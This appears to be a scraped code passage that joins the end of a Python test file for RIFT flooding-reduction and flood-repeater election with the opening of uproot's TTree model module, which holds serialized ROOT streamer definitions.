"| 27 | 5 | 5 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 7 | 7 | True |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs,
additional_node_config)
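#
# (Illustrative sketch, assuming the coverage rule implied by the tables
# above.) A grandparent counts as redundantly covered once at least
# `redundancy` of its parent adjacencies lead to elected flood repeaters.
# With redundancy 6, grandparents 23, 25, and 27 have only 3, 5, and 5 parent
# adjacencies, so they can never reach 6 and stay "False" even though every
# parent is elected.
#
def _redundantly_covered(parents, elected, redundancy):
    adjacency_counts = {}
    for parent, grandparents in parents.items():
        if parent in elected:
            for grandparent in grandparents:
                adjacency_counts[grandparent] = adjacency_counts.get(grandparent, 0) + 1
    return {gp: count >= redundancy for gp, count in adjacency_counts.items()}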
def test_disable():
packet_common.add_missing_methods_to_thrift()
#
# Flooding reduction is enabled by default
#
parents = {}
test_node = make_test_node(parents)
expected_node_re = r"Flooding Reduction Enabled[| ]*True "
assert re.search(expected_node_re, test_node.cli_details_table().to_string())
#
# Disable flooding reduction
#
additional_node_config = {"flooding_reduction": False}
test_node = make_test_node(parents, additional_node_config)
expected_node_re = r"Flooding Reduction Enabled[| ]*False "
assert re.search(expected_node_re, test_node.cli_details_table().to_string())
#
# Topology (same as test_8x8_partial_connectivity_fully_redundant_coverage)
#
parents = {
# pylint:disable=bad-whitespace
11: [21, 22, 24, 25, 26 ],
12: [ 24, 25, 26, 27, 28],
13: [21, 22, 24, 26, 27, 28],
14: [21, 22, 23, 24, 25, 26, 27, 28],
15: [ 22, 24, 26, 28],
16: [21, 28],
17: [21, 22, 23, 25, 26, 27, 28],
18: [21, 22, 23, 24, 25, 27, 28]
}
expected_parents = None
expected_grandparents = None
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs,
additional_node_config)
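#
# (Added note, not in the original test file.) With flooding reduction
# disabled there is no election at all: the parents and grandparents tables
# are None, and every interface is unconditionally a flood repeater ("True"
# with no pending state), regardless of topology.
#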
| 69.974465 | 109 | 0.295883 | 5,799 | 84,949 | 4.19762 | 0.05225 | 0.025142 | 0.061951 | 0.071481 | 0.83547 | 0.812464 | 0.787404 | 0.770602 | 0.741476 | 0.73215 | 0 | 0.043294 | 0.310728 | 84,949 | 1,213 | 110 | 70.032152 | 0.372432 | 0.039153 | 0 | 0.771429 | 0 | 0 | 0.710271 | 0.335218 | 0 | 0 | 0 | 0 | 0.021198 | 1 | 0.014747 | false | 0.000922 | 0.008295 | 0 | 0.026728 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
| e0ec972fd8efa9c2665967d8202b0e8e82382720 | 44,492 | py | Python | src/uproot/models/TTree.py | veprbl/uproot4 | 85f219a36e76dffc18da4756227a7beb760657a0 | ["BSD-3-Clause"] | 133 | 2020-05-08T21:34:11.000Z | 2022-03-07T18:12:58.000Z | src/uproot/models/TTree.py | veprbl/uproot4 | 85f219a36e76dffc18da4756227a7beb760657a0 | ["BSD-3-Clause"] | 269 | 2020-05-13T02:42:24.000Z | 2022-03-24T20:24:16.000Z | src/uproot/models/TTree.py | veprbl/uproot4 | 85f219a36e76dffc18da4756227a7beb760657a0 | ["BSD-3-Clause"] | 45 | 2020-05-15T17:48:04.000Z | 2022-03-18T19:23:07.000Z |
# BSD 3-Clause License; see https://github.com/scikit-hep/uproot4/blob/main/LICENSE
"""
This module defines versioned models for ``TTree``.
See :doc:`uproot.behaviors.TBranch` for definitions of ``TTree``-reading
functions.
"""
from __future__ import absolute_import
import struct
import numpy
import uproot
import uproot.behaviors.TTree
import uproot.models.TBranch
_ttree16_format1 = struct.Struct(">qqqqdiiiqqqqq")
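# (Added note, not in the original source.) The ">qqqqdiiiqqqqq" format above
# is big-endian: four int64 counters (fEntries, fTotBytes, fZipBytes,
# fSavedBytes), one double (fWeight), three int32 fields (fTimerInterval,
# fScanField, fUpdate), then five int64 fields (fMaxEntries through
# fEstimate), matching the 13-tuple unpacked in read_members below.
assert _ttree16_format1.size == 4 * 8 + 8 + 3 * 4 + 5 * 8  # 92 bytes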
_rawstreamer_TBranchRef_v1 = (
None,
b"@\x00\x01m\xff\xff\xff\xffTStreamerInfo\x00@\x00\x01W\x00\t@\x00\x00\x18\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\nTBranchRef\x00#`\xb3\xfd\x00\x00\x00\x01@\x00\x01-\xff\xff\xff\xffTObjArray\x00@\x00\x01\x1b\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00u\xff\xff\xff\xffTStreamerBase\x00@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TBranch\x11Branch descriptor\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x97\x8a\xac\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\r@\x00\x00\x89\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00j\x00\x02@\x00\x00d\x00\x04@\x00\x00/\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfRefTable\x18pointer to the TRefTable\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nTRefTable*\x00",
"TBranchRef",
1,
)
_rawstreamer_TRefTable_v3 = (
None,
b"@\x00\x03P\xff\xff\xff\xffTStreamerInfo\x00@\x00\x03:\x00\t@\x00\x00\x17\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\tTRefTable\x00\x8c\x89[\x85\x00\x00\x00\x03@\x00\x03\x11\xff\xff\xff\xffTObjArray\x00@\x00\x02\xff\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00@\x00\x00u\xff\xff\xff\xffTStreamerBase\x00@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00\x82\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00g\x00\x02@\x00\x00a\x00\x04@\x00\x003\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fSize dummy for backward compatibility\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\xb9\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00\x9a\x00\x02@\x00\x00\x94\x00\x04@\x00\x00_\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fParentsIarray of Parent objects (eg TTree branch) holding the referenced objects\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nTObjArray*@\x00\x00\x88\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00i\x00\x02@\x00\x00c\x00\x04@\x00\x000\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fOwner\x1cObject owning this TRefTable\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08TObject*@\x00\x00\x9e\xff\xff\xff\xffTStreamerSTL\x00@\x00\x00\x89\x00\x03@\x00\x00{\x00\x04@\x00\x00B\x00\x01\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\rfProcessGUIDs'UUIDs of TProcessIDs used in fParentIDs\x00\x00\x01\xf4\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0evector<string>\x00\x00\x00\x01\x00\x00\x00=\x00",
"TRefTable",
3,
)
_rawstreamer_TTree_v20 = (
None,
b"@\x00\x14q\xff\xff\xff\xffTStreamerInfo\x00@\x00\x14[\x00\t@\x00\x00\x13\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x05TTree\x00rd\xe0\x7f\x00\x00\x00\x14@\x00\x146\xff\xff\xff\xffTObjArray\x00@\x00\x14$\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00!\x00\x00\x00\x00@\x00\x00\x8d\xff\xff\xff\xffTStreamerBase\x00@\x00\x00w\x00\x03@\x00\x00m\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06TNamed*The basis for a named object (name, title)\x00\x00\x00C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdf\xb7J<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00t\xff\xff\xff\xffTStreamerBase\x00@\x00\x00^\x00\x03@\x00\x00T\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08TAttLine\x0fLine attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x94\x07EI\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00y\xff\xff\xff\xffTStreamerBase\x00@\x00\x00c\x00\x03@\x00\x00Y\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08TAttFill\x14Fill area attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd9*\x92\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00x\xff\xff\xff\xffTStreamerBase\x00@\x00\x00b\x00\x03@\x00\x00X\x00\x04@\x00\x00)\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nTAttMarker\x11Marker attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00)\x1d\x8b\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00{\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00`\x00\x02@\x00\x00Z\x00\x04@\x00\x00'\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fEntries\x11Number of entries\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\xa3\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\x88\x00\x02@\x00\x00\x82\x00\x04@\x00\x00O\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfTotBytes8Total number of bytes in all branches before compression\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\xa2\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\x87\x00\x02@\x00\x00\x81\x00\x04@\x00\x00N\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfZipBytes7Total number of bytes in all branches after compression\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x86\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00k\x00\x02@\x00\x00e\x00\x04@\x00\x002\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfSavedBytes\x19Number of autosaved bytes\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x8b\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00p\x00\x02@\x00\x00j\x00\x04@\x00\x007\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\rfFlushedBytes\x1cNumber of auto-flushed 
bytes\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x89\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00n\x00\x02@\x00\x00h\x00\x04@\x00\x007\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fWeight\"Tree weight (see TTree::SetWeight)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00\x89\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00n\x00\x02@\x00\x00h\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0efTimerInterval\x1eTimer interval in milliseconds\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\x8e\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00s\x00\x02@\x00\x00m\x00\x04@\x00\x00?\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfScanField'Number of runs before prompting in Scan\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\x82\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00g\x00\x02@\x00\x00a\x00\x04@\x00\x003\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fUpdate\x1eUpdate frequency for EntryLoop\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\xad\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\x92\x00\x02@\x00\x00\x8c\x00\x04@\x00\x00^\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x16fDefaultEntryOffsetLen:Initial Length of fEntryOffset table in the basket buffers\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\xb0\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\x95\x00\x02@\x00\x00\x8f\x00\x04@\x00\x00a\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0efNClusterRangeENumber of Cluster range in addition to the one defined by 'AutoFlush'\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\xa2\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\x87\x00\x02@\x00\x00\x81\x00\x04@\x00\x00N\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfMaxEntries5Maximum number of entries in case of circular buffers\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x93\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00x\x00\x02@\x00\x00r\x00\x04@\x00\x00?\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\rfMaxEntryLoop$Maximum number of entries to process\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x9d\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\x82\x00\x02@\x00\x00|\x00\x04@\x00\x00I\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0ffMaxVirtualSize,Maximum total size of buffers kept in 
memory\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\xc1\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\xa6\x00\x02@\x00\x00\xa0\x00\x04@\x00\x00m\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfAutoSaveVAutosave tree when fAutoSave entries written or -fAutoSave (compressed) bytes produced\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\xc6\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\xab\x00\x02@\x00\x00\xa5\x00\x04@\x00\x00r\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfAutoFlushZAuto-flush tree when fAutoFlush entries written or -fAutoFlush (compressed) bytes produced\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x99\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00~\x00\x02@\x00\x00x\x00\x04@\x00\x00E\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfEstimate.Number of entries to estimate histogram limits\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\xbe\xff\xff\xff\xffTStreamerBasicPointer\x00@\x00\x00\xa0\x00\x02@\x00\x00\x81\x00\x04@\x00\x00M\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x10fClusterRangeEnd/[fNClusterRange] Last entry of a cluster range.\x00\x00\x008\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tLong64_t*\x00\x00\x00\x14\x0efNClusterRange\x05TTree@\x00\x00\xd0\xff\xff\xff\xffTStreamerBasicPointer\x00@\x00\x00\xb2\x00\x02@\x00\x00\x93\x00\x04@\x00\x00_\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfClusterSizeE[fNClusterRange] Number of entries in each cluster for a given range.\x00\x00\x008\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tLong64_t*\x00\x00\x00\x14\x0efNClusterRange\x05TTree@\x00\x00\xb3\xff\xff\xff\xffTStreamerObjectAny\x00@\x00\x00\x98\x00\x02@\x00\x00\x92\x00\x04@\x00\x00V\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfIOFeatures=IO features to define for newly-written baskets and branches.\x00\x00\x00>\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11ROOT::TIOFeatures@\x00\x00y\xff\xff\xff\xffTStreamerObject\x00@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00'\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfBranches\x10List of Branches\x00\x00\x00=\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tTObjArray@\x00\x00\x92\xff\xff\xff\xffTStreamerObject\x00@\x00\x00z\x00\x02@\x00\x00t\x00\x04@\x00\x00@\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fLeaves+Direct pointers to individual branch leaves\x00\x00\x00=\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tTObjArray@\x00\x00\xa7\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00\x88\x00\x02@\x00\x00\x82\x00\x04@\x00\x00Q\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fAliases;List of aliases for expressions based on the tree 
branches.\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*@\x00\x00\x80\xff\xff\xff\xffTStreamerObjectAny\x00@\x00\x00e\x00\x02@\x00\x00_\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfIndexValues\x13Sorted index values\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD@\x00\x00}\xff\xff\xff\xffTStreamerObjectAny\x00@\x00\x00b\x00\x02@\x00\x00\\\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fIndex\x16Index of sorted values\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayI@\x00\x00\x98\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00y\x00\x02@\x00\x00s\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfTreeIndex\"Pointer to the tree Index (if any)\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0eTVirtualIndex*@\x00\x00\x8e\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00o\x00\x02@\x00\x00i\x00\x04@\x00\x008\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fFriends\"pointer to list of friend elements\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*@\x00\x00\xa6\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00\x87\x00\x02@\x00\x00\x81\x00\x04@\x00\x00P\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfUserInfo9pointer to a list of user objects associated to this Tree\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*@\x00\x00\x9b\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00|\x00\x02@\x00\x00v\x00\x04@\x00\x00@\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfBranchRef(Branch supporting the TRefTable (if any)\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0bTBranchRef*\x00",
"TTree",
20,
)
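# (Added note, not in the original source.) Each _rawstreamer_* tuple above
# bundles a serialized TStreamerInfo record together with the class name and
# class version it describes, e.g. ("TTree", 20); the first element is None in
# all three cases. The byte blobs are ROOT's own schema descriptions, which is
# why member names such as fEntries and fAutoFlush are visible inside them.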
class Model_TTree_v16(uproot.behaviors.TTree.TTree, uproot.model.VersionedModel):
"""
A :doc:`uproot.model.VersionedModel` for ``TTree`` version 16.
"""
behaviors = (uproot.behaviors.TTree.TTree,)
def read_members(self, chunk, cursor, context, file):
if self.is_memberwise:
raise NotImplementedError(
"""memberwise serialization of {0}
in file {1}""".format(
type(self).__name__, self.file.file_path
)
)
self._bases.append(
file.class_named("TNamed", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
